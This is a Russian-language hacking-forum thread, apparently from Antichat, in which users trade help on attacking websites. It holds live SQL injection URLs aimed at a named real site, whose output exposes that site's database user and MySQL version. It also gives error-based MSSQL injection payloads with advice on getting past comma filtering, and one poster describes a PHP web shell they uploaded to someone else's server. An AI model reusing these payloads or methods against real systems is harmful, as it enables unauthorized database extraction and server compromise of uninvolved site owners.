ANTICHAT — форум по информационной безопасности, OSINT и технологиям

маза в том что нужно чтобы админ перешёл по линку, когда он будет авторихован и чтобы у него всё сработало))

http://www.svetlana-russkaya.ru/index.php?pid=-101+union+select+1,2,3,4,5,6,7/*

Колонки подобраны не правильно,скоре всего


http://www.svetlana-russkaya.ru/index.php?pid=7&forf_tid=46+order+by+9/*&forf_page_num=1


помогите аскрутить плиз...

Да просто версия Мускуля - 3-я, у нее нет UNION'a:
http://www.svetlana-russkaya.ru/index.php?pid=101+and+substring(version(),1,1)=3
---
Боюсь в третьей версии ничего сделать не выйдет( слишком много ограничений...

хм и почему же ты так решил ? )
http://www.svetlana-russkaya.ru/index.php?pid=101
user=svetlana@localhost
database=svetlana
version=3.23.58
попробуй найти установочную директорию скрипта может если права на юзера криво выставленны удастся прочитать файлы

Всем привет!
Есть вопросы по MSSQL.
Есть рабочая уязвимость, например:
/?part=npcs&id=1+OR+1=(select+db_name(1))-- и т.д. в db_name -- получаем все базы.
В ошибках типа Syntax error converting the varchar value 'ТО ЧТО ИНТЕРЕСОВАЛО' to a column of data type int. вытаскиваются значения таблиц, полей, значений, но только типа varchar...
Все другие типы ( int,binary и т.д.) не возвращаются!!!
Мозг сломал не пойму, что сделать можно. Пробовал привести искомые значения к типу nvarchar ( чтобы была ошибка преобразования в int). Например :
/?part=items&id=1+OR+1=(select+top+1+cast(id+as+nva rchar)+from+sa_names)--
или так /?part=items&id=1+OR+1=(select+top+1+convert(nvarch ar,id)+from+sa_names)--
...значения не возвращаются...
И самое паршивое то, что запятые фильтруются даже в url encode %2C....и последний запрос интерпретируется как convert(nvarcharid)...
Как-то можно в таком случае, в запросе спровоцировать ошибку приведения типов или как еще....нужно выводить типы int и Binary....
Заранее ОГРОМНОЕ СПАСИБО !!!

Я что в игноре?
ПОЖАЛУЙСТА!!!! ПОМОГИТЕ!!!!!!!!!!!
хотя бы в ПМ

У тебя условие:
/?part=npcs&id=1+OR+1=(select+db_name(1))

ошибка генерится в части OR 1=(~запрос~)
при выводе в результате запроса данных типа int или binary ошибка конвертации не генерится, просто не выполняется равенство. При выводе типов int, binary экспериментируй с типом левой части приравнивания (в данном случае замени единичку).

Помогите, пожалуйста, разобраться с правами шелла.

Суть проблемы:

Залил PHPшелл на сайт - права user/user.
Некий рутовский процесс скопировал этот сайт в директорию не доступную из web, но доступную из шелла. Соответсвенно скопировал и мой шелл. Поскольку при копировании файлу присваиваются права копирующего, то в этой директории шелл приобрел права root/wheel и доступен на чтение.
Я создал в директории доступной из web символическую(мягкую) ссылку на каталог(не на файл) в котором находится рутовский шелл и зашел на него через браузер.
В итоге файл-шелл имеет Permission root/wheel, но работает он почему-то на тех же правах user/user.

Нифига не пойму. Почему он НЕ работает на правах root?
Спасибо.

Потому что в данном случае пхп запускается с правами апача, а не с правами владельца скрипта.

__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.